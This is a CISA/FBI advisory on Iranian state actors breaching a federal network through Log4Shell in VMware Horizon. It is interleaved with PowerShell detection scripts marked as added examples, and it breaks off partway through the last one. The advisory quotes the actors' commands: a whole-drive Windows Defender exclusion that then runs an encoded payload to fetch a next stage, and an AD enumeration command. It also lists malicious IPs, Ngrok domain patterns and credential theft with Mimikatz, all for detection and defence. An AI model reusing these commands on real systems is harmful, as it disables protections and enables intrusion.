
Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester


From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch (FCEB) organization where CISA observed suspected advanced persistent threat (APT) activity. In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. CISA and the Federal Bureau of Investigation (FBI) assess that the FCEB network was compromised by Iranian government-sponsored APT actors.

CISA and FBI are releasing this Cybersecurity Advisory (CSA) providing the suspected Iranian government-sponsored actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.

CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities. If suspected initial access or compromise is detected based on IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems (including the DC), and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this CSA to protect against similar malicious cyber activity.

For more information on Iranian government-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threats webpage.


For a downloadable copy of the Malware Analysis Report (MAR) accompanying this report, see: MAR 10387061-1.v1.

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques with corresponding mitigation and/or detection recommendations.

Overview

In April 2022, CISA conducted retrospective analysis using EINSTEIN—an FCEB-wide intrusion detection system (IDS) operated and monitored by CISA—and identified suspected APT activity on an FCEB organization’s network. CISA observed bi-directional traffic between the network and a known malicious IP address associated with exploitation of the Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon servers. In coordination with the FCEB organization, CISA initiated threat hunting incident response activities; however, prior to deploying an incident response team, CISA observed additional suspected APT activity. Specifically, CISA observed HTTPS activity from IP address 51.89.181[.]64 to the organization’s VMware server. Based on trusted third-party reporting, 51.89.181[.]64 is a Lightweight Directory Access Protocol (LDAP) server associated with threat actors exploiting Log4Shell. Following HTTPS activity, CISA observed a suspected LDAP callback on port 443 to this IP address. CISA also observed a DNS query for us‐nation‐ny[.]cf that resolved back to 51.89.181[.]64 when the victim server was returning this Log4Shell LDAP callback to the actors’ server.

CISA assessed that this traffic indicated a confirmed compromise based on the successful callback to the indicator and informed the organization of these findings; the organization investigated the activity and found signs of compromise. As trusted third-party reporting associated Log4Shell activity from 51.89.181[.]64 with lateral movement and targeting of DCs, CISA suspected the threat actors had moved laterally and compromised the organization’s DC.

From mid-June through mid-July 2022, CISA conducted an onsite incident response engagement and determined that the organization was compromised as early as February 2022, by likely Iranian government-sponsored APT actors who installed XMRig crypto mining software. The threat actors also moved laterally to the domain controller, compromised credentials, and implanted Ngrok reverse proxies.

Threat Actor Activity

In February 2022, the threat actors exploited Log4Shell [T1190] for initial access [TA0001] to the organization’s unpatched VMware Horizon server. As part of their initial exploitation, CISA observed a connection to known malicious IP address 182.54.217[.]2 lasting 17.6 seconds.

The actors’ exploit payload ran the following PowerShell command [T1059.001], which added an exclusion to Windows Defender [T1562.001]:

powershell try{Add-MpPreference -ExclusionPath 'C:\'; Write-Host 'added-exclusion'} catch {Write-Host 'adding-exclusion-failed' }; powershell -enc "$BASE64 encoded payload to download next stage and execute it"

The exclusion allowlisted the entire C:\ drive, enabling the threat actors to download tools to the C:\ drive without virus scans. The exploit payload then downloaded mdeploy.text from 182.54.217[.]2/mdepoy.txt to C:\users\public\mde.ps1 [T1105]. When executed, mde.ps1 downloaded file.zip from 182.54.217[.]2 and removed mde.ps1 from the disk [T1070.004].

file.zip contained XMRig cryptocurrency mining software and associated configuration files.

  • WinRing0x64.sys – XMRig Miner driver
  • wuacltservice.exe – XMRig Miner
  • config.json – XMRig miner configuration
  • RuntimeBroker.exe – Associated file. This file can create a local user account [T1136.001] and tests for internet connectivity by pinging 8.8.8.8 [T1016.001]. The exploit payload created a Scheduled Task [T1053.005] that executed RuntimeBroker.exe daily as SYSTEM. Note: By exploiting Log4Shell, the actors gained access to a VMware service account with administrator and system level access. The Scheduled Task was named RuntimeBrokerService.exe to masquerade as a legitimate Windows task.
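The scheduled task described above combines two traits a defender can hunt for on every host: it runs as SYSTEM, and its name ends in ".exe" so that it blends in with Windows binaries. The following PowerShell script is an added example (not code from the CISA advisory or from the actors) that lists tasks with that shape: SYSTEM tasks whose program sits under a user-writable directory, or whose task name imitates an executable. The list of user-writable roots is an assumption; run it as administrator so every task is visible.

```powershell
# Added example (not from the CISA advisory): list scheduled tasks with the
# shape described above, i.e. tasks that run as SYSTEM and either launch a
# program from a user-writable directory or carry a task name ending in
# ".exe" to look like a Windows binary. The list of user-writable roots is an
# assumption; run as administrator so that every task is visible.

# Directories a legitimate SYSTEM task should rarely launch from (assumption).
$userWritableRoots = @('C:\Users\', 'C:\ProgramData\', 'C:\Windows\Temp\')

function Get-SuspiciousScheduledTask {
    foreach ($task in Get-ScheduledTask) {
        $principal = [string]$task.Principal.UserId
        $runsAsSystem = ($principal -match '^(NT AUTHORITY\\)?SYSTEM$') -or ($principal -eq 'S-1-5-18')
        if (-not $runsAsSystem) { continue }

        foreach ($action in $task.Actions) {
            # Only Exec actions carry a program path; COM handler actions are skipped.
            if (-not $action.Execute) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')

            $reasons = @()
            if ($task.TaskName -match '\.exe$') { $reasons += 'task name imitates an executable' }
            foreach ($root in $userWritableRoots) {
                if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
                    $reasons += "program under user-writable path $root"
                    break
                }
            }
            if ($reasons.Count -eq 0) { continue }

            $info = $task | Get-ScheduledTaskInfo
            [pscustomobject]@{
                TaskName    = $task.TaskName
                TaskPath    = $task.TaskPath
                RunAs       = $principal
                Program     = $exe
                Arguments   = $action.Arguments
                LastRunTime = $info.LastRunTime
                NextRunTime = $info.NextRunTime
                Reasons     = ($reasons -join '; ')
            }
        }
    }
}

Get-SuspiciousScheduledTask | Format-Table -AutoSize
```

Some vendor agents legitimately run SYSTEM tasks from C:\ProgramData, so treat the output as a review list rather than a verdict; the combination of a user-writable path, an ".exe"-style task name and a recent first run is what warrants pulling the program for analysis.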

See MAR 10387061-1.v1 for additional information, including IOCs, on these four files.

After obtaining initial access and installing XMRig on the VMware Horizon server, the actors used RDP [T1021.001] and the built-in Windows user account DefaultAccount [T1078.001] to move laterally [TA0008] to a VMware VDI-KMS host. Once the threat actors established themselves on the VDI-KMS host, CISA observed the actors download around 30 megabytes of files from a transfer[.]sh server associated with 144.76.136[.]153. The actors downloaded the following tools:

  • PsExec – a Microsoft signed tool for system administrators.
  • Mimikatz – a credential theft tool.
  • Ngrok – a reverse proxy tool for proxying an internal service out onto an Ngrok domain, which the user can then access at a randomly generated subdomain at *.ngrok[.]io. CISA has observed this tool in use by some commercial products for benign purposes; however, this process bypasses typical firewall controls and may be a potentially unwanted application in production environments. Ngrok is known to be used for malicious purposes.[1]

The threat actors then executed Mimikatz on VDI-KMS to harvest credentials and created a rogue domain administrator account [T1136.002]. Using the newly created account, the actors leveraged RDP to propagate to several hosts within the network. Upon logging into each host, the actors manually disabled Windows Defender via the Graphical User Interface (GUI) and implanted Ngrok executables and configuration files. The threat actors were able to implant Ngrok on multiple hosts to ensure Ngrok’s persistence should they lose access to a machine during a routine reboot. The actors were able to proxy [T1090] RDP sessions, which were only observable on the local network as outgoing HTTPS port 443 connections to tunnel.us.ngrok[.]com and korgn.su.lennut[.]com (the prior domain in reverse). It is possible, but was not observed, that the threat actors configured a custom domain, or used other Ngrok tunnel domains, wildcarded here as *.ngrok[.]com, *.ngrok[.]io, ngrok.*.tunnel[.]com, or korgn.*.lennut[.]com.
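Because the proxied RDP sessions were visible on the local network only as outbound HTTPS to the Ngrok tunnel domains, DNS is the most practical place to look for them on a host. The script below is an added example (not from the CISA advisory) that turns the exact domains and wildcard patterns listed above into regular expressions, checks the local DNS client cache and Sysmon DNS query events (Event ID 22) against them, and includes a small constructed list of names so the matcher can be exercised offline. The use of Sysmon and the constructed sample names are assumptions.

```powershell
# Added example (not from the CISA advisory): match DNS activity on a host
# against the Ngrok tunnel domains and wildcard patterns listed above. The
# defanging brackets are removed so the names can be matched; the sample names
# at the bottom are constructed for demonstration only.

$ngrokPatterns = @(
    'tunnel.us.ngrok.com',
    'korgn.su.lennut.com',
    '*.ngrok.com',
    '*.ngrok.io',
    'ngrok.*.tunnel.com',
    'korgn.*.lennut.com'
)

function ConvertTo-DomainRegex {
    param([string]$Pattern)
    # Escape the dots, then let each '*' stand for exactly one DNS label.
    $escaped = [regex]::Escape($Pattern) -replace '\\\*', '[^.]+'
    # Also match any deeper subdomain of the pattern.
    return "^(?:[^.]+\.)*$escaped$"
}

$ngrokRegexes = $ngrokPatterns | ForEach-Object { [regex]::new((ConvertTo-DomainRegex $_), 'IgnoreCase') }

function Test-NgrokDomain {
    param([string]$Name)
    $n = $Name.TrimEnd('.')
    foreach ($rx in $ngrokRegexes) { if ($rx.IsMatch($n)) { return $true } }
    return $false
}

function Find-NgrokDnsActivity {
    $hits = [System.Collections.Generic.List[object]]::new()

    # 1. Names currently in the DNS client cache (what this host resolved recently).
    Get-DnsClientCache -ErrorAction SilentlyContinue | ForEach-Object {
        if (Test-NgrokDomain $_.Entry) {
            $hits.Add([pscustomobject]@{ Name = $_.Entry; Source = 'DnsClientCache'; Time = $null })
        }
    }

    # 2. Sysmon Event ID 22 (DNS query), present only if Sysmon DNS logging is enabled (assumption).
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 22 }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $data = ([xml]$_.ToXml()).Event.EventData.Data
        $query = ($data | Where-Object { $_.Name -eq 'QueryName' }).'#text'
        if ($query -and (Test-NgrokDomain $query)) {
            $hits.Add([pscustomobject]@{ Name = $query; Source = 'Sysmon/22'; Time = $_.TimeCreated })
        }
    }
    return $hits
}

# Constructed sample names (not observed data) to show how the matcher behaves.
$constructedSample = 'tunnel.us.ngrok.com', 'abc123.ngrok.io', 'korgn.eu.lennut.com',
                     'ngrok.eu.tunnel.com', 'update.microsoft.com', 'notngrok.com'
$constructedSample | ForEach-Object { '{0,-26} {1}' -f $_, (Test-NgrokDomain $_) }

Find-NgrokDnsActivity | Format-Table -AutoSize
```

The reversed-domain pattern korgn.*.lennut.com is deliberately kept as its own rule rather than derived from the ngrok one, so that an analyst reading the list sees the same strings the advisory publishes. If the environment routes DNS through a resolver that logs queries centrally, the same regexes can be applied there instead of on each endpoint.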

Once the threat actors established a deep foothold in the network and moved laterally to the domain controller, they executed the following PowerShell command on the Active Directory to obtain a list of all machines attached to the domain [T1018]:

Powershell.exe get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address >

The threat actors also changed the password for the local administrator account [T1098] on several hosts as a backup should the rogue domain administrator account get detected and terminated. Additionally, the threat actor was observed attempting to dump the Local Security Authority Subsystem Service (LSASS) process [T1003.001] with task manager but this was stopped by additional anti-virus the FCEB organization had installed.
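The sequence above (a new domain administrator account, RDP from it to several hosts, then local administrator password changes as a fallback) leaves a recognisable trail in the Windows Security log. The script below is an added example (not from the CISA advisory) that builds a timeline from the relevant event IDs and flags accounts that were created inside the lookback window and then logged on over RDP (Logon Type 10) from several sources. The 30-day window and the two-source threshold are this script's own assumptions; reading the Security log requires administrative rights.

```powershell
# Added example (not from the CISA advisory): correlate account creation,
# group-membership changes, password resets and RDP logons from the Security
# log, and flag accounts created in the window and then used over RDP from
# several sources. Run on the domain controller for domain accounts and on
# member hosts (or against centrally collected logs) for local accounts.
# The lookback window and source threshold are this script's own assumptions.

param(
    [int]$LookbackDays = 30,
    [int]$MinDistinctSources = 2
)

# 4720 user created, 4724 password reset, 4728/4732 member added to a global/local
# security group, 4738 account changed, 4624 logon (kept only for Logon Type 10 = RDP).
$describe = @{
    4720 = 'account created'
    4724 = 'password reset attempted'
    4728 = 'added to global group'
    4732 = 'added to local group'
    4738 = 'account changed'
}
$filter = @{ LogName = 'Security'; Id = @(4720, 4724, 4728, 4732, 4738, 4624)
             StartTime = (Get-Date).AddDays(-$LookbackDays) }

function Get-EventField {
    param([xml]$Xml, [string]$Name)
    ($Xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

$timeline = foreach ($ev in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
    $x = [xml]$ev.ToXml()
    $rec = $null
    if ($ev.Id -eq 4624) {
        if ((Get-EventField $x 'LogonType') -eq '10') {
            $ip = Get-EventField $x 'IpAddress'
            $rec = [pscustomobject]@{ Time = $ev.TimeCreated; Id = $ev.Id; Source = $ip
                                      Account = (Get-EventField $x 'TargetUserName'); Detail = "RDP logon from $ip" }
        }
    } elseif ($ev.Id -in @(4728, 4732)) {
        # Group events carry the group in TargetUserName and the member (DN or SID) in MemberName.
        $rec = [pscustomobject]@{ Time = $ev.TimeCreated; Id = $ev.Id; Source = $null
                                  Account = (Get-EventField $x 'MemberName')
                                  Detail = "$($describe[$ev.Id]) $(Get-EventField $x 'TargetUserName')" }
    } else {
        $rec = [pscustomobject]@{ Time = $ev.TimeCreated; Id = $ev.Id; Source = $null
                                  Account = (Get-EventField $x 'TargetUserName')
                                  Detail = "$($describe[$ev.Id]) by $(Get-EventField $x 'SubjectUserName')" }
    }
    if ($rec) { $rec }
}

# Accounts created inside the window and then seen logging on over RDP from several sources.
$created = @($timeline | Where-Object { $_.Id -eq 4720 } | Select-Object -ExpandProperty Account -Unique)
$findings = foreach ($acct in $created) {
    $rdp = @($timeline | Where-Object { $_.Id -eq 4624 -and $_.Account -eq $acct })
    $sources = @($rdp | Select-Object -ExpandProperty Source -Unique)
    if ($sources.Count -ge $MinDistinctSources) {
        [pscustomobject]@{
            Account         = $acct
            Created         = ($timeline | Where-Object { $_.Id -eq 4720 -and $_.Account -eq $acct } |
                               Sort-Object Time | Select-Object -First 1).Time
            RdpLogons       = $rdp.Count
            DistinctSources = $sources.Count
            Sources         = ($sources -join ', ')
        }
    }
}

$timeline | Sort-Object Time | Format-Table Time, Id, Account, Detail -AutoSize
$findings | Format-Table -AutoSize
```

The 4724 events on member hosts are the counterpart of the local administrator password changes described above: a burst of them across many hosts, all performed by the same subject account shortly after that account was created, is the pattern to look for in the timeline.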

MITRE ATT&CK TACTICS AND TECHNIQUES

See table 1 for all referenced threat actor tactics and techniques in this advisory, as well as corresponding detection and/or mitigation recommendations. For additional mitigations, see the Mitigations section.

Table 1: Cyber Threat Actors ATT&CK Techniques for Enterprise

Initial Access

Exploit Public-Facing Application (T1190)
Use: The actors exploited Log4Shell for initial access to the organization’s VMware Horizon server.
Mitigation/Detection: Use a firewall or web-application firewall and enable logging to prevent and detect potential Log4Shell exploitation attempts [M1050].
Mitigation: Perform regular vulnerability scanning to detect Log4j vulnerabilities and update Log4j software using vendor-provided patches [M1016], [M1051].

Execution

Command and Scripting Interpreter: PowerShell (T1059.001)
Use: The actors ran PowerShell commands that added an exclusion to Windows Defender, and executed PowerShell on the AD to obtain a list of machines on the domain.
Mitigation: Disable or remove PowerShell for non-administrative users [M1042], [M1026], or enable code signing to execute only signed scripts [M1045].
Mitigation: Employ anti-malware to automatically detect and quarantine malicious scripts [M1049].

Persistence

Account Manipulation (T1098)
Use: The actors changed the password for the local administrator account on several hosts.
Mitigation: Use multifactor authentication for user and privileged accounts [M1032].
Detection: Monitor events for changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728, and 4670. Monitor for modification of accounts in correlation with other suspicious activity [DS0002].

Create Account: Local Account (T1136.001)
Use: The actors’ malware can create local user accounts.
Mitigation: Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts.
Detection: Monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add, useradd, and dscl -create [DS0017].
Detection: Enable logging for new user creation [DS0002].

Create Account: Domain Account (T1136.002)
Use: The actors used Mimikatz to create a rogue domain administrator account.
Mitigation: Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts.
Detection: Enable logging for new user creation, especially domain administrator accounts [DS0002].

Scheduled Task/Job: Scheduled Task (T1053.005)
Use: The actors’ exploit payload created Scheduled Task RuntimeBrokerService.exe, which executed RuntimeBroker.exe daily as SYSTEM.
Mitigation: Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM [M1028].
Detection: Monitor for newly constructed processes and/or command lines that execute from svchost.exe in Windows 10 and from the Windows Task Scheduler taskeng.exe on older versions of Windows [DS0009].
Detection: Monitor for newly constructed scheduled jobs by enabling the Microsoft-Windows-TaskScheduler/Operational setting within the event logging service [DS0003].

Valid Accounts: Default Accounts (T1078.001)
Use: The actors used the built-in Windows user account DefaultAccount.
Mitigation: Change default usernames and passwords immediately after installation and before deployment to a production environment [M1027].
Detection: Develop rules to monitor logon behavior across default accounts that have been activated or logged into [DS0028].

Defense Evasion

Impair Defenses: Disable or Modify Tools (T1562.001)
Use: The actors added an exclusion to Windows Defender that allowlisted the entire C:\ drive, enabling them to bypass virus scans for tools they downloaded to that drive. The actors also manually disabled Windows Defender via the GUI.
Mitigation: Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security services [M1018].
Detection: Monitor for changes made to Windows Registry keys and/or values related to services and startup programs that correspond to security tools, such as HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender [DS0024].
Detection: Monitor for telemetry that provides context for modification or deletion of information related to security software processes or services, such as Windows Defender definition files in Windows and system log files in Linux [DS0013].
Detection: Monitor processes for unexpected termination related to security tools/services [DS0009].
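The two Defender changes in this advisory, the Add-MpPreference -ExclusionPath 'C:\' command shown in the Threat Actor Activity section and the manual disabling of Defender covered by this table entry, can both be audited from the host. The script below is an added example (not from the CISA advisory) that lists current exclusion paths and flags any that cover a whole drive, reads the policy key named in the detection row above, and pulls Defender Operational Event ID 5007 (configuration changed), which is where an exclusion addition is recorded. It requires the Defender PowerShell module and administrative rights; the 30-day lookback is an assumption.

```powershell
# Added example (not from the CISA advisory): audit a host for the Defender
# tampering described in this advisory. Lists exclusion paths and flags
# whole-drive ones, reads the policy registry values that switch Defender off,
# and pulls Event ID 5007 (configuration changed) from the Defender Operational
# log. Requires the Defender module; run as administrator. Lookback is an assumption.

function Get-DefenderTamperingIndicators {
    param([int]$LookbackDays = 30)

    $pref = Get-MpPreference
    $exclusions = @($pref.ExclusionPath | Where-Object { $_ })
    # A bare drive root such as 'C:\' disables scanning for the whole volume.
    $wholeDrive = @($exclusions | Where-Object { $_ -match '^[A-Za-z]:\\?$' })

    # Policy values are absent unless set by Group Policy or by someone tampering.
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $disableAntiSpyware = if (Test-Path $policyKey) { (Get-ItemProperty $policyKey).DisableAntiSpyware } else { $null }
    $rtpKey = Join-Path $policyKey 'Real-Time Protection'
    $disableRealtime = if (Test-Path $rtpKey) { (Get-ItemProperty $rtpKey).DisableRealtimeMonitoring } else { $null }

    # Event 5007 carries the old and new value of the changed setting, so exclusion
    # additions and DisableAntiSpyware flips both appear here with a timestamp.
    $filter = @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007
                 StartTime = (Get-Date).AddDays(-$LookbackDays) }
    $changes = @(Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{ Time             = $_.TimeCreated
                               ExclusionRelated = ($_.Message -match 'Exclusions')
                               Message          = ($_.Message -replace '\s+', ' ') }
        })

    [pscustomobject]@{
        ExclusionPaths           = $exclusions
        WholeDriveExclusions     = $wholeDrive
        RealtimeMonitoringOff    = [bool]$pref.DisableRealtimeMonitoring
        PolicyDisableAntiSpyware = $disableAntiSpyware
        PolicyDisableRealtime    = $disableRealtime
        ConfigChanges            = $changes
    }
}

$report = Get-DefenderTamperingIndicators
$report | Format-List

# Remediation once the host has been imaged: drop whole-drive exclusions.
# -WhatIf only shows what would change; remove it to apply.
foreach ($path in $report.WholeDriveExclusions) {
    Remove-MpPreference -ExclusionPath $path -WhatIf
}
```

Collect the 5007 events before anything is remediated: the timestamp of the exclusion change is the earliest host-side marker of the exploit payload running, and it anchors the rest of the timeline.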

Indicator Removal on Host: File Deletion (T1070.004)
Use: The actors removed the malicious file mde.ps1 from the disk.
Detection: Monitor executed commands and arguments for actions that could be utilized to unlink, rename, or delete files [DS0017].
Detection: Monitor for unexpected deletion of files from the system [DS0022].

Credential Access

OS Credential Dumping: LSASS Memory (T1003.001)
Use: The actors were observed trying to dump the LSASS process.
Mitigation: With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping [M1043].
Mitigation: On Windows 10, enable Attack Surface Reduction (ASR) rules to secure LSASS and prevent credential stealing [M1040].
Mitigation: Ensure that local administrator accounts have complex, unique passwords across all systems on the network [M1027].
Detection: Monitor for unexpected processes interacting with LSASS.exe. Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored [DS0009].
Detection: Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of LSASS [DS0017].

Credentials from Password Stores (T1555)
Use: The actors used Mimikatz to harvest credentials.
Mitigation: Organizations may consider weighing the risk of storing credentials in password stores and web browsers. If system, software, or web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in improper locations [M1027].
Detection: Monitor for processes being accessed that may search for common password storage locations to obtain user credentials [DS0009].
Detection: Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials [DS0017].

Discovery

Remote System Discovery (T1018)
Use: The actors executed a PowerShell command on the AD to obtain a list of all machines attached to the domain.
Detection: Monitor executed commands and arguments that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement [DS0017].
Detection: Monitor for newly constructed network connections associated with pings/scans that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement [DS0029].
Detection: Monitor for newly executed processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession [DS0009].

System Network Configuration Discovery: Internet Connection Discovery (T1016.001)
Use: The actors’ malware tests for internet connectivity by pinging 8.8.8.8.
Mitigation: Monitor executed commands, arguments [DS0017] and executed processes (e.g., tracert or ping) [DS0009] that may check for internet connectivity on compromised systems.

Lateral Movement

Remote Services: Remote Desktop Protocol (T1021.001)
Use: The actors used RDP to move laterally to multiple hosts on the network.
Mitigation: Use MFA for remote logins [M1032].
Mitigation: Disable the RDP service if it is unnecessary [M1042].
Mitigation: Do not leave RDP accessible from the internet. Enable firewall rules to block RDP traffic between network security zones within a network [M1030].
Mitigation: Consider removing the local Administrators group from the list of groups allowed to log in through RDP [M1026].
Detection: Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10). Other factors, such as access patterns (ex: multiple systems over a relatively short period of time) and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP [DS0028].

Command and Control

Proxy (T1090)
Use: The actors used Ngrok to proxy RDP connections and to perform command and control.
Mitigation: Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists [M1037].
Detection: Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure) [DS0029].

Ingress Tool Transfer (T1105)
Use: The actors downloaded malware and multiple tools to the network, including PsExec, Mimikatz, and Ngrok.
Mitigation: Employ anti-malware to automatically detect and quarantine malicious scripts [M1049].


INCIDENT RESPONSE

If suspected initial access or compromise is detected based on IOCs or TTPs in this CSA, CISA encourages organizations to assume lateral movement by threat actors and investigate connected systems and the DC.

CISA recommends organizations apply the following steps before applying any mitigations, including patching.

  1. Immediately isolate affected systems.
  2. Collect and review relevant logs, data, and artifacts. Take a memory capture of the device(s) and a forensic image capture for detailed analysis.
  3. Consider soliciting support from a third-party incident response organization that can provide subject matter expertise to ensure the actor is eradicated from the network and to avoid residual issues that could enable follow-on exploitation.
  4. Report incidents to CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870) or your local FBI field office, or FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [email protected].

CISA and FBI recommend implementing the mitigations below and in Table 1 to improve your organization’s cybersecurity posture on the basis of threat actor behaviors.

  • Install updated builds to ensure affected VMware Horizon and UAG systems are updated to the latest version.
    • If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat those VMware Horizon systems as compromised. Follow the pro-active incident response procedures outlined above prior to applying updates. If no compromise is detected, apply these updates as soon as possible.
      • See VMware Security Advisory VMSA-2021-0028.13 and VMware Knowledge Base (KB) 87073 to determine which VMware Horizon components are vulnerable.
      • Note: Until the update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible.
      • If upgrading is not immediately feasible, see KB87073 and KB87092 for vendor-provided temporary workarounds. Implement temporary solutions using an account with administrative privileges. Note that these temporary solutions should not be treated as permanent fixes; vulnerable components should be upgraded to the latest build as soon as possible.
      • Prior to implementing any temporary solution, ensure appropriate backups have been completed.
      • Verify successful implementation of mitigations by executing the vendor supplied script Horizon_Windows_Log4j_Mitigations.zip without parameters to ensure that no vulnerabilities remain. See KB87073 for details.
  • Keep all software up to date and prioritize patching known exploited vulnerabilities (KEVs).
  • Minimize the internet-facing attack surface by hosting essential services on a segregated DMZ, ensuring strict network perimeter access controls, and not hosting internet-facing services that are not essential to business operations. Where possible, implement regularly updated web application firewalls (WAF) in front of public-facing services. WAFs can protect against web-based exploitation using signatures and heuristics that are likely to block or alert on malicious traffic.
  • Use best practices for identity and access management (IAM) by implementing phishing resistant multifactor authentication (MFA), enforcing use of strong passwords, regularly auditing administrator accounts and permissions, and limiting user access through the principle of least privilege. Disable inactive accounts uniformly across the AD, MFA systems, etc.
    • If using Windows 10 version 1607 or Windows Server 2016 or later, monitor or disable Windows DefaultAccount, also known as the Default System Managed Account (DSMA).
  • Audit domain controllers to log successful Kerberos Ticket Granting Service (TGS) requests and ensure the events are monitored for anomalous activity.
  • Secure accounts.
    • Enforce the principle of least privilege. Administrator accounts should have the minimum permission necessary to complete their tasks.
    • Ensure there are unique and distinct administrative accounts for each set of administrative tasks.
    • Create non-privileged accounts for privileged users and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).
  • Create a deny list of known compromised credentials and prevent users from using known-compromised passwords.
  • Secure credentials by restricting where accounts and credentials can be used and by using local device credential protection features. 
    • Use virtualizing solutions on modern hardware and software to ensure credentials are securely stored.
    • Ensure storage of clear text passwords in LSASS memory is disabled. Note: For Windows 8, this is enabled by default. For more information see Microsoft Security Advisory Update to Improve Credentials Protection and Management.
    • Consider disabling or limiting NTLM and WDigest Authentication.
    • Implement Credential Guard for Windows 10 and Server 2016 (refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
    • Minimize the AD attack surface to reduce malicious ticket-granting activity. Malicious activity such as “Kerberoasting” takes advantage of Kerberos’ TGS and can be used to obtain hashed credentials that threat actors attempt to crack.
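Several of the credential-protection items above (clear-text passwords in LSASS memory, WDigest and NTLM, Credential Guard, LSA protection, the DefaultAccount) map to concrete host settings that can be checked in one pass. The script below is an added example (not from the CISA advisory) that reports each setting with a pass/fail verdict. The registry paths, the Win32_DeviceGuard class and the ASR rule GUID for "Block credential stealing from the Windows local security authority subsystem" are Microsoft's documented values; the pass/fail thresholds (for example LmCompatibilityLevel 5) are this script's own choices. Run as administrator.

```powershell
# Added example (not from the CISA advisory): check one host against the
# credential-protection items listed above. Registry paths, the Credential
# Guard CIM class and the ASR rule GUID are Microsoft's documented values;
# the pass/fail thresholds are this script's own. Run as administrator.

function Get-RegistryValueOrNull {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-CredentialProtection {
    $results = [System.Collections.Generic.List[object]]::new()
    function Add-Result {
        param([string]$Check, $Value, [bool]$Pass, [string]$Advice)
        $results.Add([pscustomobject]@{ Check = $Check; Value = $Value; Pass = $Pass; Advice = $Advice })
    }

    # WDigest: UseLogonCredential = 1 keeps clear-text passwords in LSASS memory.
    $wdigest = Get-RegistryValueOrNull 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    Add-Result 'WDigest UseLogonCredential' $wdigest ($wdigest -ne 1) 'Set to 0 explicitly; 1 stores clear-text credentials in LSASS.'

    # LSA protection (Protected Process Light): RunAsPPL = 1 (or 2 on recent builds)
    # stops unprotected processes, Mimikatz included, from opening LSASS.
    $ppl = Get-RegistryValueOrNull 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'RunAsPPL'
    Add-Result 'LSA RunAsPPL' $ppl ($ppl -in @(1, 2)) 'Set RunAsPPL=1 (Windows 8.1 / Server 2012 R2 and later).'

    # Credential Guard: SecurityServicesRunning contains 1 when it is active.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $cgRunning = [bool]($dg -and ($dg.SecurityServicesRunning -contains 1))
    Add-Result 'Credential Guard running' $cgRunning $cgRunning 'Enable Windows Defender Credential Guard (Windows 10 / Server 2016 and later).'

    # ASR rule "Block credential stealing from the Windows local security authority subsystem".
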